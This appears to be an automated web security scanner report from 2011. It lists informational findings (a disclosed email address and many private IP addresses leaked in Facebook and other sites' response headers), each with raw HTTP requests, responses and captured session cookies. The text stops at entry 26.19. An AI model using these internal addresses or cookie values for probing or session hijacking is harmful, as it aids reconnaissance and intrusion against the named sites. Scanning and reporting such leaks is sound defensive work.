Severity:	Information
Confidence:	Certain
Host:	http://www.travelguard.com
Path:	/WorkArea/java/ektron.js

Issue detail

The following email address was disclosed in the response:

jquery-en@googlegroups.com

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Host: www.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.travelguard.com&SiteLanguage=1033; EktGUID=a15d51f4-28a7-4b4a-80f5-62beb814a8df; EkAnalytics=newuser; ASP.NET_SessionId=xj4zcmmhhzhxmb30ab3nfl45

Response

HTTP/1.1 200 OK
Content-Length: 172238
Content-Type: application/x-javascript
Content-Location: http://www.travelguard.com/WorkArea/java/ektron.js
Last-Modified: Wed, 25 Nov 2009 14:17:00 GMT
Accept-Ranges: bytes
ETag: "096daf3d96dca1:13c8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:43:40 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...
(Ektron.RegExp.rtrim,""); },

// method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements
// from: http://www.mail-archive.com/jquery-en@googlegroups.com/msg72499.html
positionedOffset: function(elem) {
var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position();
if ( !/^body|html$/i.tes
...[SNIP]...

25.35. http://www.travelguard.com/tgi3/00common/js/tracking/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travelguard.com
Path:	/tgi3/00common/js/tracking/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /tgi3/00common/js/tracking/s_code.js HTTP/1.1
Host: www.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.travelguard.com&SiteLanguage=1033; EktGUID=a15d51f4-28a7-4b4a-80f5-62beb814a8df; EkAnalytics=newuser; ASP.NET_SessionId=xj4zcmmhhzhxmb30ab3nfl45

Response

HTTP/1.1 200 OK
Content-Length: 41172
Content-Type: application/x-javascript
Content-Location: http://www.travelguard.com/tgi3/00common/js/tracking/s_code.js
Last-Modified: Thu, 08 Apr 2010 17:33:48 GMT
Accept-Ranges: bytes
ETag: "0e652a541d7ca1:13c8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:43:48 GMT

.../* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
...[SNIP]...
s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+ "`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+ ";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`I
...[SNIP]...

26. Private IP addresses disclosed previous next
There are 40 instances of this issue:

http://api.ak.facebook.com/restserver.php
http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif
http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif
http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/sdch/vD843DpA.dct
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js
https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

26.1. http://api.ak.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.ak.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.50.102

Request

GET /restserver.php?v=1.0&method=links.getStats&format=json&urls=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&callback=jsonp1305508793343 HTTP/1.1
Host: api.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=utf-8
Pragma:
X-FB-Rev: 378427
X-FB-Server: 10.36.50.102
X-Cnection: close
Content-Length: 375
Cache-Control: public, max-age=120
Expires: Mon, 16 May 2011 01:27:14 GMT
Date: Mon, 16 May 2011 01:25:14 GMT
Connection: close

jsonp1305508793343([{"url":"http:\/\/www.magicalkingdoms.com\/blog\/2011\/05\/09\/the-dream-differences-on-disney-cruise-line\/","normalized_url":"http:\/\/www.magicalkingdoms.com\/blog\/2011\/05\/09\
...[SNIP]...

26.2. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-facebook.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.96.229

Request

Response

26.3. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-twitter.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.96.229

Request

Response

26.4. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.159.189

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.siteadvisor.com/download/windows.html?cid=64895
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc
If-None-Match: "8279b1007e81a5634a0531d0b8345618"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "96b20198eb85ccc0d6b57d6a1ccd11c1"
X-FB-Server: 10.27.159.189
X-Cnection: close
Content-Length: 211449
Vary: Accept-Encoding
Cache-Control: public, max-age=1158
Expires: Mon, 16 May 2011 01:51:41 GMT
Date: Mon, 16 May 2011 01:32:23 GMT
Connection: close

/*1305462020,169582525,JIT Construction: v378427,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

26.5. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.136.124

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.siteadvisor.com/download/windows.html?cid=64895
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc
If-None-Match: "7534b25717a0f24080452f5a5a3a2d84"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "8c448743c350ca6ea48df8387793f43c"
X-FB-Server: 10.32.136.124
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=692
Expires: Mon, 16 May 2011 01:43:53 GMT
Date: Mon, 16 May 2011 01:32:21 GMT
Connection: close

/*1305414233,169904252,JIT Construction: v378352,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

26.6. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df21000168%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ffbfa666e8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.183
Content-Length: 3017
Vary: Accept-Encoding
Cache-Control: public, max-age=934
Expires: Mon, 16 May 2011 01:56:02 GMT
Date: Mon, 16 May 2011 01:40:28 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.7. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.182

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df252ad6968%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F14%2Fplay-on-%25e2%2580%2593-psn-restoration-begins-now%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.182
Content-Length: 3017
Vary: Accept-Encoding
Cache-Control: public, max-age=297
Expires: Sun, 15 May 2011 20:32:06 GMT
Date: Sun, 15 May 2011 20:27:09 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.8. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1ba9f8d8%26origin%3Dhttp%253A%252F%252Fwww.telegraph.co.uk%252Ff42dbbf0%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.telegraph.co.uk%2Fsponsored%2Ftravel%2Fdisney%2F8509938%2FDisney-Cruise-Line-A-world-of-entertainment.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=360
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 3017
Vary: Accept-Encoding
Cache-Control: public, max-age=595
Expires: Mon, 16 May 2011 01:30:09 GMT
Date: Mon, 16 May 2011 01:20:14 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.9. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.47.42

Request

GET /extern/login_status.php?api_key=4d15f6008d23faa991f6df49d07988c6&extern=0&channel=http%3A%2F%2Fwww.siteadvisor.com%2Fdownload%2Fwindows.html%3Fcid%3D64895%26fbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.siteadvisor.com/download/windows.html?cid=64895
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.47.42
X-Cnection: close
Date: Mon, 16 May 2011 01:40:24 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

26.10. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.9.116

Request

GET /plugins/like.php?href=http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1&layout=standard&show_faces=false&width=190&action=like&colorscheme=light&height=26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.11. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.40.106

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df263c019d4%26origin%3Dhttp%253A%252F%252Fwww.telegraph.co.uk%252Ff3972649c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.telegraph.co.uk%2Fsponsored%2Ftravel%2F8509794%2FWin-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=360 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.12. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.229.62

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.13. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.47.59

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.14. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.255.49

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.15. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.88.23

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df7a5fdddc%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F14%2Fps3-system-software-update%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.16. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.42.107

Request

GET /plugins/like.php?href=http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1&layout=button_count&show_faces=false&width=125&action=recommend&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.17. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.221.39

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.18. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.29.50

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e2ccd5c%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F10%2Fpsn-restoration-timeline-update%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.19. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php
